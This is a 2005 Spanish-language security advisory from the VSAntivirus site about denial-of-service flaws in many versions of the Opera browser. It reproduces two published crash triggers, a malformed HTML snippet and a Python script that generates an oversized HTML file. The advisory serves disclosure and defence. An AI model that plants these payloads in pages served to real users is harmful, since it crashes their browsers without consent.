Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
  

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

Denegación de servicio en Opera Web Browser
 
VSantivirus No. 1933 Año 9, sábado 22 de octubre de 2005

 Denegación de servicio en Opera Web Browser
http://www.vsantivirus.com/vul-opera-171005.htm

Por Angela Ruiz
angela@videosoft.net.uy

Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa.

El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

No se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este navegador.

El primer ejemplo es un código HTML mal formado:

<html><head></head><body><bdo>A<bgsound style=
"margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso, contenido HTML:

html = open("opera.html", "w")
html.write("<html style=\"content: url(0);\">\n")
html.write("<head></head>\n")
buff1 = 'A'*32499
html.write("<bodyA>\n"+buff1+"\n")
buff2 = 'B'*153
html.write("<u "+buff2+">\n")
html.write("</body></html>")
html.close()


Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0 
- Opera Web Browser 7.54 
- Opera Web Browser 7.53 
- Opera Web Browser 7.52 
- Opera Web Browser 7.51 
- Opera Web Browser 7.50 
- Opera Web Browser 7.23 
- Opera Web Browser 7.22 
- Opera Web Browser 7.21 
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20 
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11 
- Opera Web Browser 7.10 
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1 
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0 
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12 
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3


Soluciones:

No existe al momento actual, ninguna solución oficial para este problema.


Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info


Créditos:

posidron@tripbit.net






(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2005 Video Soft BBS